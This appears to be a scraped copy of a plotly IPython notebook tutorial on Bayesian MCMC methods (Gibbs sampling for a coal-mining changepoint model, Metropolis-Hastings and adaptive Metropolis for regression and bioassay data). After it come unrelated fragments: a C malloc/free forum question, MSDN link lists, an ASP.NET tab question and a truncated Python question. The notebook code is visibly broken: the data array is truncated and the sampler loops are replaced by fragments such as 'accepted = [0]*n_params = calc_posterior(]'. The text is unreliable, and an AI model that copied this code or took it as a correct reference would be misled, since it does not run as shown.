Occurrences of disasters in the time series is thought to be derived from a Poisson process with a large rate parameter in the early part of the time series, and from one with a smaller rate in the later part. We are interested in locating the change point in the series, which perhaps is related to changes in mining safety regulations.
disasters_array = np.array([4, 5, 4, 0, 1,, 1, 4, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1]) n_count_data = len(disasters_array)
import plotly.plotly as py import plotly.graph_objs as pgo
data = pgo.Data([ pgo.Scatter( x=[str(year) + '-01-01' for year in np.arange(1851, 1962)], y=disasters_array, mode='lines+markers' ) ])
layout = pgo.Layout( title='UK coal mining disasters (per year), 1851--1962', xaxis=pgo.XAxis(title='Year', type='date', range=['1851-01-01', '1962-01-01']), yaxis=pgo.YAxis(title='Disaster count') )
fig = pgo.Figure(data=data, layout=layout)
py.iplot(fig, filename='coal_mining_disasters')
We are going to use Poisson random variables for this type of count data. Denoting year $i$'s accident count by $y_i$,$$y_i \sim \text{Poisson}(\lambda).$$
For those unfamiliar, Poisson random variables look like this:
data2 = pgo.Data([ pgo.Histogram( x=np.random.poisson(l, 1000), opacity=0.75, name=u'λ=%i' % l ) for l in [1, 5, 12, 25] ])
layout_grey_bg = pgo.Layout( xaxis=pgo.XAxis(zeroline=False, showgrid=True, gridcolor='rgb(255, 255, 255)'), yaxis=pgo.YAxis(zeroline=False, showgrid=True, gridcolor='rgb(255, 255, 255)'), paper_bgcolor='rgb(255, 255, 255)', plot_bgcolor='rgba(204, 204, 204, 0.5)' )
layout2 = layout_grey_bg.copy()
layout2.update( barmode='overlay', title='Poisson Means', xaxis=pgo.XAxis(range=[0, 50]), yaxis=pgo.YAxis(range=[0, 400]) )
fig2 = pgo.Figure(data=data2, layout=layout2)
py.iplot(fig2, filename='poisson_means')
The modeling problem is about estimating the values of the $\lambda$ parameters. Looking at the time series above, it appears that the rate declines over time.
A changepoint model identifies a point (here, a year) after which the parameter $\lambda$ drops to a lower value. Let us call this point in time $\tau$. So we are estimating two $\lambda$ parameters: $\lambda = \lambda_1$ if $t \lt \tau$ and $\lambda = \lambda_2$ if $t \geq \tau$.
We need to assign prior probabilities to both $\{\lambda_1, \lambda_2\}$. The gamma distribution not only provides a continuous density function for positive numbers, but it is also conjugate with the Poisson sampling distribution.
lambda1_lambda2 = [(0.1, 100), (1, 100), (1, 10), (10, 10)]
data3 = pgo.Data([ pgo.Histogram( x=np.random.gamma(*p, size=1000), opacity=0.75, name=u'α=%i, β=%i' % (p[0], p[1])) for p in lambda1_lambda2 ])
layout3 = layout_grey_bg.copy() layout3.update( barmode='overlay', xaxis=pgo.XAxis(range=[0, 300]) )
fig3 = pgo.Figure(data=data3, layout=layout3)
py.iplot(fig3, filename='gamma_distributions')
We will specify suitably vague hyperparameters $\alpha$ and $\beta$ for both priors:\begin{align} \lambda_1 &\sim \text{Gamma}(1, 10), \\ \lambda_2 &\sim \text{Gamma}(1, 10). \end{align}
Since we do not have any intuition about the location of the changepoint (unless we visualize the data), we will assign a discrete uniform prior over the entire observation period [1851, 1962]:\begin{align} &\tau \sim \text{DiscreteUniform(1851, 1962)}\\ &\Rightarrow P(\tau = k) = \frac{1}{111}. \end{align}
Implementing Gibbs sampling¶
We are interested in estimating the joint posterior of $\lambda_1, \lambda_2$ and $\tau$ given the array of annnual disaster counts $\mathbf{y}$. This gives:$$ P( \lambda_1, \lambda_2, \tau | \mathbf{y} ) \propto P(\mathbf{y} | \lambda_1, \lambda_2, \tau ) P(\lambda_1, \lambda_2, \tau) $$
To employ Gibbs sampling, we need to factor the joint posterior into the product of conditional expressions:$$ P(\lambda_1, \lambda_2, \tau | \mathbf{y}) \propto P(y_{t \lt \tau} | \lambda_1, \tau) P(y_{t \geq \tau} | \lambda_2, \tau) P(\lambda_1) P(\lambda_2) P(\tau) $$
which we have specified as:$$\begin{aligned} P( \lambda_1, \lambda_2, \tau | \mathbf{y} ) &\propto \left[\prod_{t=1851}^{\tau} \text{Poi}(y_t|\lambda_1) \prod_{t=\tau+1}^{1962} \text{Poi}(y_t|\lambda_2) \right] \text{Gamma}(\lambda_1|\alpha,\beta) \text{Gamma}(\lambda_2|\alpha, \beta) \frac{1}{111} \\ &\propto \left[\prod_{t=1851}^{\tau} e^{-\lambda_1}\lambda_1^{y_t} \prod_{t=\tau+1}^{1962} e^{-\lambda_2} \lambda_2^{y_t} \right] \lambda_1^{\alpha-1} e^{-\beta\lambda_1} \lambda_2^{\alpha-1} e^{-\beta\lambda_2} \\ &\propto \lambda_1^{\sum_{t=1851}^{\tau} y_t +\alpha-1} e^{-(\beta+\tau)\lambda_1} \lambda_2^{\sum_{t=\tau+1}^{1962} y_i + \alpha-1} e^{-\beta\lambda_2} \end{aligned}$$
So, the full conditionals are known, and critically for Gibbs, can easily be sampled from.$$\lambda_1 \sim \text{Gamma}(\sum_{t=1851}^{\tau} y_t +\alpha, \tau+\beta)$$$$\lambda_2 \sim \text{Gamma}(\sum_{t=\tau+1}^{1962} y_i + \alpha, 1962-\tau+\beta)$$$$\tau \sim \text{Categorical}\left( \frac{\lambda_1^{\sum_{t=1851}^{\tau} y_t +\alpha-1} e^{-(\beta+\tau)\lambda_1} \lambda_2^{\sum_{t=\tau+1}^{1962} y_i + \alpha-1} e^{-\beta\lambda_2}}{\sum_{k=1851}^{1962} \lambda_1^{\sum_{t=1851}^{\tau} y_t +\alpha-1} e^{-(\beta+\tau)\lambda_1} \lambda_2^{\sum_{t=\tau+1}^{1962} y_i + \alpha-1} e^{-\beta\lambda_2}} \right)$$
Implementing this in Python requires random number generators for both the gamma and discrete uniform distributions. We can leverage NumPy for this:
# Function to draw random gamma variate rgamma = np.random.gamma def rcategorical(probs, n=None): # Function to draw random categorical variate return np.array(probs).cumsum().searchsorted(np.random.sample(n))
Next, in order to generate probabilities for the conditional posterior of $\tau$, we need the kernel of the gamma density:
\[\lambda^{\alpha-1} e^{-\beta \lambda}\]
dgamma = lambda lam, a, b: lam**(a - 1) * np.exp(-b * lam)
Diffuse hyperpriors for the gamma priors on $\{\lambda_1, \lambda_2\}$:
alpha, beta = 1., 10
For computational efficiency, it is best to pre-allocate memory to store the sampled values. We need 3 arrays, each with length equal to the number of iterations we plan to run:
# Specify number of iterations n_iterations = 1000 # Initialize trace of samples lambda1, lambda2, tau = np.empty((3, n_iterations + 1))
The penultimate step initializes the model paramters to arbitrary values:
lambda1[0] = 6 lambda2[0] = 2 tau[0] = 50
Now we can run the Gibbs sampler.
# Sample from conditionals for i in range(n_iterations): # Sample early mean lambda1[i + 1] = rgamma(disasters_array[:tau[i]].sum() + alpha, 1./(tau[i] + beta)) # Sample late mean lambda2[i + 1] = rgamma(disasters_array[tau[i]:].sum() + alpha, 1./(n_count_data - tau[i] + beta)) # Sample changepoint: first calculate probabilities (conditional) p = np.array([dgamma(lambda1[i + 1], disasters_array[:t].sum() + alpha, t + beta) * dgamma(lambda2[i + 1], disasters_array[t:].sum() + alpha, n_count_data - t + beta) for t in range(n_count_data)]) # ... then draw sample tau[i + 1] = rcategorical(p/p.sum())
Plotting the trace and histogram of the samples reveals the marginal posteriors of each parameter in the model.
color = '#3182bd'
trace1 = pgo.Scatter( y=lambda1, xaxis='x1', yaxis='y1', line=pgo.Line(width=1), marker=pgo.Marker(color=color) ) trace2 = pgo.Histogram( x=lambda1, xaxis='x2', yaxis='y2', line=pgo.Line(width=0.5), marker=pgo.Marker(color=color) ) trace3 = pgo.Scatter( y=lambda2, xaxis='x3', yaxis='y3', line=pgo.Line(width=1), marker=pgo.Marker(color=color) ) trace4 = pgo.Histogram( x=lambda2, xaxis='x4', yaxis='y4', marker=pgo.Marker(color=color) ) trace5 = pgo.Scatter( y=tau, xaxis='x5', yaxis='y5', line=pgo.Line(width=1), marker=pgo.Marker(color=color) ) trace6 = pgo.Histogram( x=tau, xaxis='x6', yaxis='y6', marker=pgo.Marker(color=color) )
data4 = pgo.Data([trace1, trace2, trace3, trace4, trace5, trace6])
import plotly.tools as tls
fig4['data'] += data4
def add_style(fig): for i in fig['layout'].keys(): fig['layout'][i]['zeroline'] = False fig['layout'][i]['showgrid'] = True fig['layout'][i]['gridcolor'] = 'rgb(255, 255, 255)' fig['layout']['paper_bgcolor'] = 'rgb(255, 255, 255)' fig['layout']['plot_bgcolor'] = 'rgba(204, 204, 204, 0.5)' fig['layout']['showlegend']=False
add_style(fig4)
fig4['layout'].update( yaxis1=pgo.YAxis(title=r'$\lambda_1$'), yaxis3=pgo.YAxis(title=r'$\lambda_2$'), yaxis5=pgo.YAxis(title=r'$\tau$'))
py.iplot(fig4, filename='modelling_params')
The Metropolis-Hastings Algorithm¶
The key to success in applying the Gibbs sampler to the estimation of Bayesian posteriors is being able to specify the form of the complete conditionals of ${\bf \theta}$, because the algorithm cannot be implemented without them. In practice, the posterior conditionals cannot always be neatly specified.
Taking a different approach, the Metropolis-Hastings algorithm generates candidate state transitions from an alternate distribution, and accepts or rejects each candidate probabilistically.
Let us first consider a simple Metropolis-Hastings algorithm for a single parameter, $\theta$. We will use a standard sampling distribution, referred to as the proposal distribution, to produce candidate variables $q_t(\theta^{\prime} | \theta)$. That is, the generated value, $\theta^{\prime}$, is a possible next value for $\theta$ at step $t+1$. We also need to be able to calculate the probability of moving back to the original value from the candidate, or $q_t(\theta | \theta^{\prime})$. These probabilistic ingredients are used to define an acceptance ratio:$$\begin{gathered} \begin{split}a(\theta^{\prime},\theta) = \frac{q_t(\theta^{\prime} | \theta) \pi(\theta^{\prime})}{q_t(\theta | \theta^{\prime}) \pi(\theta)}\end{split}\notag\\\begin{split}\end{split}\notag\end{gathered}$$
The value of $\theta^{(t+1)}$ is then determined by:$$\theta^{(t+1)} = \left\{\begin{array}{l@{\quad \mbox{with prob.} \quad}l}\theta^{\prime} & \text{with probability } \min(a(\theta^{\prime},\theta^{(t)}),1) \\ \theta^{(t)} & \text{with probability } 1 - \min(a(\theta^{\prime},\theta^{(t)}),1) \end{array}\right.$$
This transition kernel implies that movement is not guaranteed at every step. It only occurs if the suggested transition is likely based on the acceptance ratio.
A single iteration of the Metropolis-Hastings algorithm proceeds as follows:
Sample $\theta^{\prime}$ from $q(\theta^{\prime} | \theta^{(t)})$.
Generate a Uniform[0,1] random variate $u$.
If $a(\theta^{\prime},\theta) > u$ then $\theta^{(t+1)} = \theta^{\prime}$, otherwise $\theta^{(t+1)} = \theta^{(t)}$.
The original form of the algorithm specified by Metropolis required that $q_t(\theta^{\prime} | \theta) = q_t(\theta | \theta^{\prime})$, which reduces $a(\theta^{\prime},\theta)$ to $\pi(\theta^{\prime})/\pi(\theta)$, but this is not necessary. In either case, the state moves to high-density points in the distribution with high probability, and to low-density points with low probability. After convergence, the Metropolis-Hastings algorithm describes the full target posterior density, so all points are recurrent.
Random-walk Metropolis-Hastings¶
A practical implementation of the Metropolis-Hastings algorithm makes use of a random-walk proposal. Recall that a random walk is a Markov chain that evolves according to:$$ \theta^{(t+1)} = \theta^{(t)} + \epsilon_t \\ \epsilon_t \sim f(\phi) $$
As applied to the MCMC sampling, the random walk is used as a proposal distribution, whereby dependent proposals are generated according to:$$\begin{gathered} \begin{split}q(\theta^{\prime} | \theta^{(t)}) = f(\theta^{\prime} - \theta^{(t)}) = \theta^{(t)} + \epsilon_t\end{split}\notag\\\begin{split}\end{split}\notag\end{gathered}$$
Generally, the density generating $\epsilon_t$ is symmetric about zero, resulting in a symmetric chain. Chain symmetry implies that $q(\theta^{\prime} | \theta^{(t)}) = q(\theta^{(t)} | \theta^{\prime})$, which reduces the Metropolis-Hastings acceptance ratio to:$$\begin{gathered} \begin{split}a(\theta^{\prime},\theta) = \frac{\pi(\theta^{\prime})}{\pi(\theta)}\end{split}\notag\\\begin{split}\end{split}\notag\end{gathered}$$
The choice of the random walk distribution for $\epsilon_t$ is frequently a normal or Student’s $t$ density, but it may be any distribution that generates an irreducible proposal chain.
An important consideration is the specification of the scale parameter for the random walk error distribution. Large values produce random walk steps that are highly exploratory, but tend to produce proposal values in the tails of the target distribution, potentially resulting in very small acceptance rates. Conversely, small values tend to be accepted more frequently, since they tend to produce proposals close to the current parameter value, but may result in chains that mix very slowly.
Some simulation studies suggest optimal acceptance rates in the range of 20-50%. It is often worthwhile to optimize the proposal variance by iteratively adjusting its value, according to observed acceptance rates early in the MCMC simulation .
Example: Linear model estimation¶
This very simple dataset is a selection of real estate prices \(p\), with the associated age \(a\) of each house. We wish to estimate a simple linear relationship between the two variables, using the Metropolis-Hastings algorithm.
Linear model:$$\mu_i = \beta_0 + \beta_1 a_i$$
Sampling distribution:$$p_i \sim N(\mu_i, \tau)$$
Prior distributions:$$\begin{aligned} & \beta_i \sim N(0, 10000) \cr & \tau \sim \text{Gamma}(0.001, 0.001) \end{aligned}$$
age = np.array([13, 14, 14,12, 9, 15, 10, 14, 9, 14, 13, 12, 9, 10, 15, 11, 15, 11, 7, 13, 13, 10, 9, 6, 11, 15, 13, 10, 9, 9, 15, 14, 14, 10, 14, 11, 13, 14, 10]) price = np.array([2950, 2300, 3900, 2800, 5000, 2999, 3950, 2995, 4500, 2800, 1990, 3500, 5100, 3900, 2900, 4950, 2000, 3400, 8999, 4000, 2950, 3250, 3950, 4600, 4500, 1600, 3900, 4200, 6500, 3500, 2999, 2600, 3250, 2500, 2400, 3990, 4600, 450,4700])/1000.
To avoid numerical underflow issues, we typically work with log-transformed likelihoods, so the joint posterior can be calculated as sums of log-probabilities and log-likelihoods.
This function calculates the joint log-posterior, conditional on values for each parameter:
from scipy.stats import distributions dgamma = distributions.gamma.logpdf dnorm = distributions.norm.logpdf def calc_posterior(a, b, t, y=price, x=age): # Calculate joint posterior, given values for a, b and t # Priors on a,b logp = dnorm(a, 0, 10000) + dnorm(b, 0, 10000) # Prior on t logp += dgamma(t, 0.001, 0.001) # Calculate mu mu = a + b*x # Data likelihood logp += sum(dnorm(y, mu, t**-2)) return logp
The
metropolis function implements a simple random-walk Metropolis-Hastings sampler for this problem. It accepts as arguments:
- the number of iterations to run
- initial values for the unknown parameters
- the variance parameter of the proposal distribution (normal)
rnorm = np.random.normal runif = np.random.rand def metropolis(n_iterations, initial_values, prop_var=1): n_params = len(initial_values) # Initial proposal standard deviations prop_sd = [prop_var]*n_params # Initialize trace for parameters trace = np.empty((n_iterations+1, n_params)) # Set initial values trace[0] = initial_values # Calculate joint posterior for initial values current_log_prob = calc_posterior(*trace[0]) # Initialize acceptance counts accepted = [0]*n_params = calc_posterior(] return trace, accepted
Let's run the MH algorithm with a very small proposal variance:
n_iter = 10000 trace, acc = metropolis(n_iter, initial_values=(1,0,1), prop_var=0.001)
Iteration 0 Iteration 1000 Iteration 2000 Iteration 3000 Iteration 4000 Iteration 5000 Iteration 6000 Iteration 7000 Iteration 8000 Iteration 9000
We can see that the acceptance rate is way too high:
np.array(acc, float)/n_iter
array([ 0.9768, 0.9689, 0.961 ])
trace1 = pgo.Scatter( y=trace.T[0], xaxis='x1', yaxis='y1', marker=pgo.Marker(color=color) ) trace2 = pgo.Histogram( x=trace.T[0], xaxis='x2', yaxis='y2', marker=pgo.Marker(color=color) ) trace3 = pgo.Scatter( y=trace.T[1], xaxis='x3', yaxis='y3', marker=pgo.Marker(color=color) ) trace4 = pgo.Histogram( x=trace.T[1], xaxis='x4', yaxis='y4', marker=pgo.Marker(color=color) ) trace5 = pgo.Scatter( y=trace.T[2], xaxis='x5', yaxis='y5', marker=pgo.Marker(color=color) ) trace6 = pgo.Histogram( x=trace.T[2], xaxis='x6', yaxis='y6', marker=pgo.Marker(color=color) )
data5 = pgo.Data([trace1, trace2, trace3, trace4, trace5, trace6])
fig5['data'] += data5
add_style(fig5)
fig5['layout'].update(showlegend=False, yaxis1=pgo.YAxis(title='intercept'), yaxis3=pgo.YAxis(title='slope'), yaxis5=pgo.YAxis(title='precision') )
py.iplot(fig5, filename='MH algorithm small proposal variance')
Now, with a very large proposal variance:
trace_hivar, acc = metropolis(n_iter, initial_values=(1,0,1), prop_var=100)
Iteration 0 Iteration 1000 Iteration 2000 Iteration 3000 Iteration 4000 Iteration 5000 Iteration 6000 Iteration 7000 Iteration 8000 Iteration 9000
np.array(acc, float)/n_iter
array([ 0.003 , 0.0001, 0.0009])
trace1 = pgo.Scatter( y=trace_hivar.T[0], xaxis='x1', yaxis='y1', marker=pgo.Marker(color=color) ) trace2 = pgo.Histogram( x=trace_hivar.T[0], xaxis='x2', yaxis='y2', marker=pgo.Marker(color=color) ) trace3 = pgo.Scatter( y=trace_hivar.T[1], xaxis='x3', yaxis='y3', marker=pgo.Marker(color=color) ) trace4 = pgo.Histogram( x=trace_hivar.T[1], xaxis='x4', yaxis='y4', marker=pgo.Marker(color=color) ) trace5 = pgo.Scatter( y=trace_hivar.T[2], xaxis='x5', yaxis='y5', marker=pgo.Marker(color=color) ) trace6 = pgo.Histogram( x=trace_hivar.T[2], xaxis='x6', yaxis='y6', marker=pgo.Marker(color=color) )
data6 = pgo.Data([trace1, trace2, trace3, trace4, trace5, trace6])
fig6['data'] += data6
add_style(fig6)
fig6['layout'].update( yaxis1=pgo.YAxis(title='intercept'), yaxis3=pgo.YAxis(title='slope'), yaxis5=pgo.YAxis(title='precision') )
py.iplot(fig6, filename='MH algorithm large proposal variance')
Adaptive Metropolis¶
In order to avoid having to set the proposal variance by trial-and-error, we can add some tuning logic to the algorithm. The following implementation of Metropolis-Hastings reduces proposal variances by 10% when the acceptance rate is low, and increases it by 10% when the acceptance rate is high.
def metropolis_tuned(n_iterations, initial_values, f=calc_posterior, prop_var=1, tune_for=None, tune_interval=100): n_params = len(initial_values) # Initial proposal standard deviations prop_sd = [prop_var] * n_params # Initialize trace for parameters trace = np.empty((n_iterations+1, n_params)) # Set initial values trace[0] = initial_values # Initialize acceptance counts accepted = [0]*n_params # Calculate joint posterior for initial values current_log_prob = f(*trace[0]) if tune_for is None: tune_for = n_iterations/2 = f(] # Tune every 100 iterations if (not (i+1) % tune_interval) and (i < tune_for): # Calculate aceptance rate acceptance_rate = (1.*accepted[j])/tune_interval if acceptance_rate<0.1: prop_sd[j] *= 0.9 if acceptance_rate<0.2: prop_sd[j] *= 0.95 if acceptance_rate>0.4: prop_sd[j] *= 1.05 elif acceptance_rate>0.6: prop_sd[j] *= 1.1 accepted[j] = 0 return trace[tune_for:], accepted
trace_tuned, acc = metropolis_tuned(n_iter*2, initial_values=(1,0,1), prop_var=5, tune_interval=25, tune_for=n_iter)
Iteration 0 Iteration 1000 Iteration 2000 Iteration 3000 Iteration 4000 Iteration 5000 Iteration 6000 Iteration 7000 Iteration 8000 Iteration 9000 Iteration 10000 Iteration 11000 Iteration 12000 Iteration 13000 Iteration 14000 Iteration 15000 Iteration 16000 Iteration 17000 Iteration 18000 Iteration 19000
np.array(acc, float)/(n_iter)
array([ 0.2888, 0.312 , 0.3421])
trace1 = pgo.Scatter( y=trace_tuned.T[0], xaxis='x1', yaxis='y1', line=pgo.Line(width=1), marker=pgo.Marker(color=color) ) trace2 = pgo.Histogram( x=trace_tuned.T[0], xaxis='x2', yaxis='y2', marker=pgo.Marker(color=color) ) trace3 = pgo.Scatter( y=trace_tuned.T[1], xaxis='x3', yaxis='y3', line=pgo.Line(width=1), marker=pgo.Marker(color=color) ) trace4 = pgo.Histogram( x=trace_tuned.T[1], xaxis='x4', yaxis='y4', marker=pgo.Marker(color=color) ) trace5 = pgo.Scatter( y=trace_tuned.T[2], xaxis='x5', yaxis='y5', line=pgo.Line(width=0.5), marker=pgo.Marker(color=color) ) trace6 = pgo.Histogram( x=trace_tuned.T[2], xaxis='x6', yaxis='y6', marker=pgo.Marker(color=color) )
data7 = pgo.Data([trace1, trace2, trace3, trace4, trace5, trace6])
fig7['data'] += data7
add_style(fig7)
fig7['layout'].update( yaxis1=pgo.YAxis(title='intercept'), yaxis3=pgo.YAxis(title='slope'), yaxis5=pgo.YAxis(title='precision') )
py.iplot(fig7, filename='adaptive-metropolis')
50 random regression lines drawn from the posterior:
# Data points points = pgo.Scatter( x=age, y=price, mode='markers' ) # Sample models from posterior xvals = np.linspace(age.min(), age.max()) line_data = [np.column_stack([np.ones(50), xvals]).dot(trace_tuned[np.random.randint(0, 1000), :2]) for i in range(50)] # Generate Scatter obejcts lines = [pgo.Scatter(x=xvals, y=line, opacity=0.5, marker=pgo.Marker(color='#e34a33'), line=pgo.Line(width=0.5)) for line in line_data] data8 = pgo.Data([points] + lines) layout8 = layout_grey_bg.copy() layout8.update( showlegend=False, hovermode='closest', xaxis=pgo.XAxis(title='Age', showgrid=False, zeroline=False), yaxis=pgo.YAxis(title='Price', showline=False, zeroline=False) ) fig8 = pgo.Figure(data=data8, layout=layout8) py.iplot(fig8, filename='regression_lines')
Exercise: Bioassay analysis¶
Gelman et al. (2003) present an example of an acute toxicity test, commonly performed on animals to estimate the toxicity of various compounds.
In this dataset
log_dose includes 4 levels of dosage, on the log scale, each administered to 5 rats during the experiment. The response variable is
death, the number of positive responses to the dosage.
The number of deaths can be modeled as a binomial response, with the probability of death being a linear function of dose:
The common statistic of interest in such experiments is the LD50, the dosage at which the probability of death is 50%.
Use Metropolis-Hastings sampling to fit a Bayesian model to analyze this bioassay data, and to estimate LD50.
# Log dose in each group log_dose = [-.86, -.3, -.05, .73] # Sample size in each group n = 5 # Outcomes deaths = [0, 1, 3, 5]
from scipy.stats import distributions dbin = distributions.binom.logpmf dnorm = distributions.norm.logpdf invlogit = lambda x: 1./(1 + np.exp(-x)) def calc_posterior(a, b, y=deaths, x=log_dose): # Priors on a,b logp = dnorm(a, 0, 10000) + dnorm(b, 0, 10000) # Calculate p p = invlogit(a + b*np.array(x)) # Data likelihood logp += sum([dbin(yi, n, pi) for yi,pi in zip(y,p)]) return logp
bioassay_trace, acc = metropolis_tuned(n_iter, f=calc_posterior, initial_values=(1,0), prop_var=5, tune_for=9000)
Iteration 0 Iteration 1000 Iteration 2000 Iteration 3000 Iteration 4000 Iteration 5000 Iteration 6000 Iteration 7000 Iteration 8000 Iteration 9000
trace1 = pgo.Scatter( y=bioassay_trace.T[0], xaxis='x1', yaxis='y1', marker=pgo.Marker(color=color) ) trace2 = pgo.Histogram( x=bioassay_trace.T[0], xaxis='x2', yaxis='y2', marker=pgo.Marker(color=color) ) trace3 = pgo.Scatter( y=bioassay_trace.T[1], xaxis='x3', yaxis='y3', marker=pgo.Marker(color=color) ) trace4 = pgo.Histogram( x=bioassay_trace.T[1], xaxis='x4', yaxis='y4', marker=pgo.Marker(color=color) )
data9 = pgo.Data([trace1, trace2, trace3, trace4])
fig9 = tls.make_subplots(2, 2)
This is the format of your plot grid: [ (1,1) x1,y1 ] [ (1,2) x2,y2 ] [ (2,1) x3,y3 ] [ (2,2) x4,y4 ]
fig9['data'] += data9
add_style(fig9)
fig9['layout'].update( yaxis1=pgo.YAxis(title='intercept'), yaxis3=pgo.YAxis(title='slope') )
py.iplot(fig9, filename='bioassay') | https://plot.ly/ipython-notebooks/computational-bayesian-analysis/ | CC-MAIN-2018-05 | en | refinedweb |
Hello! I have a question in regards to malloc/calloc and free in C. What I'm unsure about is the "depth" (for lack of a better word) that free operates to. I know that sounds strange so let this example hopefully explain what I mean:
#include <stdlib.h> int main () { int length = 10; char **list = (char **) malloc(sizeof(char *) * length); char *temp; int i; for (i = 0; i < length; i++) { temp = (char *) malloc(13); temp = "Hello world!\0"; list[i] = temp; } free(list); // free the char** AND all of its indices' malloc'd memory? }
So I was wondering if the last call of free would not only free up the char ** memory of "list", but also all the malloc'd memory of each of its indices? Or does it not, and should in fact be called via:
for(i = 0; i < length; i++) free(list[i]); free(list);
... which would explicitly free each index before the pointer to char pointers.
So would some compilers know that only freeing the list should free all its indices, or would I always get a memory leak with that? Either way, I want to know if there's an ANSI standard on this... which is probably the second method here if anything.
Thanks in advance for clearing up my confusion!
Edited by shadwickman: n/a | https://www.daniweb.com/programming/software-development/threads/248945/the-extent-of-free-on-malloc-calloc | CC-MAIN-2018-05 | en | refinedweb |
This notebook demonstrates how to do a simple differential expression analysis on a gene expression dataset. We use false discovery rates to provide interpretable results when conducting an analysis that involves large scale multiple hypothesis testing.
The data set we analyze here contains measurements of the expression levels of 22,283 genes in peripheral blood mononuclear cells (PBMCs). Data for 127 subjects are included, 26 of whom have ulcerative colitis, and 59 of whom have Crohn's disease (the remaining subjects are healthy and will not be considered here). The goal is to identify genes that have different mean expression levels in the two disease groups.
The raw data are available here as accession number GDS1615 from the NCBI's GEO (Gene Expression Omnibus) site.
Here are the import statements for the modules that we will use.
import gzip import numpy as np import urllib2 import gzip from StringIO import StringIO from statsmodels.stats.multitest import multipletests from scipy.stats.distributions import norm import matplotlib.pyplot as plt
We cannot decompress data on the fly while reading from a url, so instead we first download the compressed data into a string, wrap the string in a stringio object, and wrap that in a gzipfile object that can do the decompression.
url = urllib2.urlopen("") zdata = url.read() sio = StringIO(zdata) fid = gzip.GzipFile(fileobj=sio)
Alternatively, the data can be downloaded and read this way:
fid = gzip.open("GDS1615_full.soft.gz")
Next we read the SOFT format data file into the following data structures:
We begin by reading the header section of the data file, and placing the information we need into a dictionary:
SIF = {} for line in fid: if line.startswith("!dataset_table_begin"): break elif line.startswith("!subset_description"): subset_description = line.split("=")[1].strip() elif line.startswith("!subset_sample_id"): subset_ids = line.split("=")[1].split(",") subset_ids = [x.strip() for x in subset_ids] for k in subset_ids: SIF[k] = subset_description
Now we create arrays containing some information we will need while processing the data.
# Next line is the column headers (sample id's) SID = fid.next().split("\t") # The column indices that contain gene expression data I = [i for i,x in enumerate(SID) if x.startswith("GSM")] # Restrict the column headers to those that we keep SID = [SID[i] for i in I] # Get a list of sample labels STP = [SIF[k] for k in SID]
Next we read the gene expression data row by row, and place the gene id's into a separate array.
# Read the gene expression data as a list of lists, also get the gene identifiers GID,X = [],[] for line in fid: # This is what signals the end of the gene expression data # section in the file if line.startswith("!dataset_table_end"): break V = line.split("\t") # Extract the values that correspond to gene expression measures # and convert the strings to numbers x = [float(V[i]) for i in I] X.append(np.asarray(x)) GID.append(V[0] + ";" + V[1]) # Convert the Python list of lists to a Numpy array. X = np.asarray(X)
We are comparing two groups, and will ignore the remaining (healthy) samples. Here we get the column indices of the samples in each of the two groups being compared.
# The indices of samples for the ulcerative colitis group UC = [i for i,x in enumerate(STP) if x == "ulcerative colitis"] # The indices of samples for the Crohn's disease group CD = [i for i,x in enumerate(STP) if x == "Crohn's disease"]
Gene expression data is usually skewed, so we analyze it on the log scale.
XL = np.log(X) / np.log(2)
Now that we have the data, we can calculate the mean and variance for each gene within each of the two groups.
MUC = XL[:,UC].mean(1) ## Mean of ulcerative colitis samples MCD = XL[:,CD].mean(1) ## Mean of Crohn's disease samples VUC = XL[:,UC].var(1) ## Variance of ulcerative colitis samples VCD = XL[:,CD].var(1) ## Variance of Crohn's disease samples nUC = len(UC) ## Number of ulcerative colitis samples nCD = len(CD) ## Number of Crohn's disease samples
The Z-scores summarize the evidence for differential expression.
zscores = (MUC - MCD) / np.sqrt(VUC/nUC + VCD/nCD)
If a gene is not differentially expressed, it has the same expected value in the two groups of samples. In this case, the Z-score will be standardized (i.e. will have mean zero and unit standard deviation). This data set contains data for 22,283 genes. So if none of the genes are differentially expressed, our Z-scores should approximately have zero mean and unit variance. We can check this as follows.
print zscores.mean() print zscores.std()
0.174053802007 1.50181311998
Since the standard deviation is much greater than 1, there appear to be multiple genes for which the mean expression levels in the ulcerative colitis and Crohn's disease samples differ. Further, since the mean Z-score is positive, it appears that the dominant pattern is for genes to be expressed at a higher level in the ulcerative colitis compared to the Crohn's disease samples.
The conventional threshold for statistical significance is a p-value smaller than 0.05, which corresponds to the Z-score being greater than 2 in magnitude. Many genes meet this condition, however as we will see below this does not carry much evidence that these genes are differentially expressed.
print np.mean(np.abs(zscores) > 2) print np.mean(zscores > 2) print np.mean(zscores < -2)
0.175470089306 0.108199075528 0.0672710137773
To use the multiple testing methods we need to convert the Z-scores to p-values.
pvalues = 2*norm.cdf(-np.abs(zscores))
Here we compute the Benjamini-Hochberg false discovery rates. The adjusted p-values are in the first position of the returned value.
pm = multipletests(pvalues, method="fdr_bh") apv = pm[1]
This plot shows how the Z-scores and false discovery rates are related.
ii = np.argsort(zscores) plt.plot(zscores[ii], apv[ii], '-') plt.xlabel("Z-score") plt.ylabel("False Discovery Rate")
<matplotlib.text.Text at 0x5221ed0>
This plot shows how the p-values and false discovery rates are related.
ii = np.argsort(pvalues) plt.plot(pvalues[ii], apv[ii], '-') plt.xlabel("p-value") plt.ylabel("False Discovery Rate")
<matplotlib.text.Text at 0x3b69ad0> | http://nbviewer.jupyter.org/urls/umich.box.com/shared/static/7kh8amlez7bx3qlqa6aa.ipynb | CC-MAIN-2018-05 | en | refinedweb |
View Complete Post
Hello everyone,
sorry if the following appears like a total newbie question, but I'm taking my first college course using MS SQL Server & SSIS, so please bear with me :)
I'm currently working on an assignment and face a couple (maybe mundane) problems:
This month we look at tools for enhancing the LINQ to SQL and Entity Framework designers, Oren Eini's .NET development blog, Visual Studio tab customization, and more.
Scott Mitchell
MSDN Magazine December 2009
Dr. James McCaffrey
MSDN Magazine March 2007
If you want to create your own professional looking tabs and controls in Office, check out the RibbonX API of the 2007 Microsoft Office system.
Eric Faller
MSDN Magazine February 2007
Paul DiLascia
MSDN Magazine November 2005
Hi
Is there a possibilities to create ajax tab within a ajax tab?
Pls advise..")
<%@ Register assembly="AjaxControlToolkit" namespace="AjaxControlToolkit" tagprefix="cc2" %>
<%
Hall of Fame Twitter Terms of Service Privacy Policy Contact Us Archives Tell A Friend | http://www.dotnetspark.com/links/40251-removing-tabs-etc-from-derived-col-transform.aspx | CC-MAIN-2018-05 | en | refinedweb |
I have a complex data structure that I'm trying to process.
Explanation of the data structure: I have a dictionary of classes. The key is a name. The value is a class reference. The class contains two lists of dictionaries.
